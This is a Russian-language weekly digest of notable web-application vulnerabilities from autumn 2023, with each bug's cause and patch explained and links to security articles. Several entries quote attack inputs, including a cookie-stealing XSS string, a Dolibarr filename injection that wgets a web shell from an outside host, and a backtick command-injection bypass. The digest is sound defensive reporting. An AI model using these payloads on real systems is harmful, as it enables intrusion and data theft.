🔍Наиболее интересные уязвимости прошедшей недели

🐛 CVE-2023-5009 в системе контроля версии GitLab продуктов CE и EE версий от 13.12 до 16.2.7, от 16.3 до 16.3.4, позволяет запустить пайплайн через запланированные политики сканирования безопасности, что может привести к утечкам данных и к атакам на цепочки поставок. В рамках исправления уязвимости commit были внесены корректировки переменных, отвечающих за планирование политик (замена schedule.owner `на `security_policy_bot или security_policy_bot_2)

🐛 CVE-2023-5060 в системе мониторинга сети LibRemMS, которая приводит к XSS. Для выполнения атаки достаточно ввести в поле IP4 поисковой формы "><noscript>alert(document.cookie)</noscript>. В процессе исправления уязвимости была добавлена функция экранирования HTML-спецсимволов htmlspecialchars($_POST['address']).

🐛 CVE-2023-5084 в приложении hestiacp до версии 1.8.8 (панель управления web-приложением) приводит к множественным XSS. Атака возможна с подменой параметров v_timezone и v_backend_template в теле запроса. Исправление уязвимости commit исключает использования параметра v_backend_template для формирования ответа и реализует проверку на «белый» список параметра v_timezone.

🐛 CVE-2023-38886 в системе Dolibarr ERP CRM до версии 17.0.1, позволяет привилегированному удаленному пользователю выполнить произвольный код. Для реализации атаки используется функционал backup и поле для ввода имени файла с полезной нагрузкой wget 192.168.1.167 && mv index.html shell.php. В приложении некорректно реализована функция санитизации введенного значения имени файла. Полный разбор уязвимости опубликован здесь.

🐛 CVE-2023-43770 в почтовом веб-клиенте Roundcube до 1.4.14, 1.5.x до 1.5.4, и 1.6.x до 1.6.3 позволяет выполнить XSS через полученное e-mail сообщение. Причина уязвимости заключается в отсутствии проверки пользовательских данных на символы <, >, в результате появляется возможность инъекции тегов html-кода. При исправлении проблемы commit были добавлены символы <, > в шаблоны, используемые в контроле пользовательских данных.

🐛 CVE-2023-42793 в JetBrains TeamCity до версии 2023.05.4 позволяет обойти процесс аутентификации и в последствии выполнить произвольный код на атакуемом сервере. Проблема заключается в неправильном паттерне пути запроса (/**/RPC2), для которого были отключены предобработчики, в том числе и предобработчик аутентификации. Злоумышленник может обратиться к произвольному пути, в конец которого добавить /RPC2, что позволит обойти механизмы защиты. Исправление уязвимости заключается в указании правильного паттерна пути для RPC2 - /RPC2.

🐛 CVE-2023-5002 в платформе pgAdmin для администрирования PostgreSQL до версии 7.6 позволяет выполнить произвольные системные команды. Уязвимость заключается в отсутствии проверки значения параметра utility_path в эндпойнте /misc/validate_binary_path, которое попадает в качестве первого аргумента в функцию subprocess.getoutput. Первое исправление не устранило уязвимость, была добавлена недостаточная санитизация пользовательских данных - замена одного символа двойной кавычки на два, что по прежнему позволяло выполнять произвольные команды, например, оборачивая их в обратные кавычки (`` ls ``). В финальном исправлении функция subprocess.getoutput была реализована замена на более безопасный вариант - subprocess.run с shell=False.

⁉️Хотите, чтобы эта #экспериментальная_рубрика стала постоянной? Ждём ваших реакций и комментариев👇

📌 Наиболее интересные публикации по аппсеку за прошедшую неделю

📰 Описание эффективной техники обфускации in-memory сборок .NET от R-Tec.

📰 И снова RSA, и снова Блейхенбахер, и снова оракулы... Оригинал статьи о старой-новой атаке MARVIN, краткое саммари на русском.

📰 Опыт от VK по аппсеку внутренних ресурсов.

📰 Краткая история функций парольного хэширования.

📰 Очередная атака по побочным каналам, на этот раз на GPU, поэтому "GPU.zip".

📰 Весьма годный FAQ по проблемам безопасности многопоточных вычислений. Здесь же, нельзя не упомянуть о более ранних, но не менее годных статьях от PortSwigger на эту же тему (раз, два).

📰 Детальный разбор CVE-2023-35813 — атаки на древний, мамонтовый, но иногда всё ещё актуальный TemplateParser в ASP.Net WebForms.

📰 Поучительная история о том, как DLL hijacking в WinDbg был исправлен в рамках багбаунти, но так и не получил подтверждённого CVE.

📰 Разбор ещё одной CVE-2023-38831, винрарной в самом прямом смысле этого слова 🦄

📰 Статья от Veracode об управлении секретами в условиях облачной разработки.

⁉️Это — тоже #экспериментальная_рубрика. Что нужно делать, чтобы она стала постоянной, вы, впрочем, уже знаете👇

🔍Наиболее интересные уязвимости прошедшей недели

🐛 CVE-2023-40044 в платформе для обмена данными Progress Software WS_FTP Server до версий 8.7.4 и 8.8.2 позволяет неаутентифицированному атакующему выполнять произвольные команды с помощью эксплуатации небезопасной .NET десериализации. Уязвимость заключается в использовании небезопасной реализации BinaryFormatter.Deserialize для десериализации пользовательских данных, полученных из POST multipart запроса к эндпойнтам модуля "Ad Hoc Transfer" ( /AHT ) и последующего формирования экземпляра класса SettingsStorageObject, в котором содержатся только три публичных поля типа массива символов. В таких случаях разработчикам было бы достаточно реализовать свой SerializationBinder, в котором ограничить использование типов или использовать иные методы заполнения полей при формирования экземпляров класса, но в патче только была вырезана уязвимая функциональность. Для эксплуатации достаточно стандартных стандартных цепочек гаджетов из набора ysoserial.net (например, DataSet).

🐛 CVE-2023-4863 в библиотеке libwebp для обработки изображений формата WebP, исправленная в коммите 902bc91, позволяет злоумышленнику выполнить запись за пределы кучи с помощью специально сформированного webp файла. Уязвимость заключается в выделении буфера huffman_tables некорректного размера внутри функции ReadHuffmanCode и последующей записи в него данных, размер которых превышает это значение. Размер huffman_tables вычисляется на основе предварительно сформированного массива kTableSize, который учитывает только размеры для поиска в 8-битной таблице первого уровня. Поскольку libwebp поддерживает коды длиной до 15 бит, проблема может возникнуть, когда функция BuildHuffmanTable попытается заполнить таблицы второго уровня. В патче была добавлена проверка корректности входных данных с помощью вызова функции VP8LBuildHuffmanTable при первом проходе (в котором еще не идет запись в таблицу Хаффмана) для расчета необходимого размера, если данные некорректны - выполнение завершается. Более подробный разбор уязвимости можно посмотреть в этой статье.

🐛 CVE-2023-43256 в платформе домашнего ассистента Gladys Assistant позволяет привилегированному удаленному пользователю читать произвольные файлы на сервере. Уязвимость заключается в отсутствии проверки значений входящих параметров запроса folder и file в обработчике запроса getStreamingFile (/api/v1/service/rtsp-camera/camera/streaming/:folder/:file). Значения данных параметров участвуют в формировании пути (path.join(gladys.config.tempFolder, req.params.folder, req.params.file)) для возвращаемого в ответе файла. В патче была добавлена проверка входящих значений по строгому паттерну (/index[0-9]+.ts/) или наличие в массиве допустимых значений ['index.m3u8', 'index.m3u8.key', 'key_info_file.txt'] для file и /^camera-[a-zA-Z0-9-_]+$/ для folder).

🐛 CVE-2023-2315 в OpenCart с версии 4.0.0.0 до 4.0.2.2 позволяет аутентифицированному пользователю с правами на доступ/модификацию в компоненте Log удалять содержимое произвольных файлов на сервере. Уязвимость заключается в отсутствии санитизации параметра запроса filename у эндпойнта tool/log.clear, который впоследствии попадает в функцию fopen с модификатором доступа w+ для очистки файла. Патч добавляет использование функции basename при извлечении из параметра запроса последнего компонента пути (имени файла).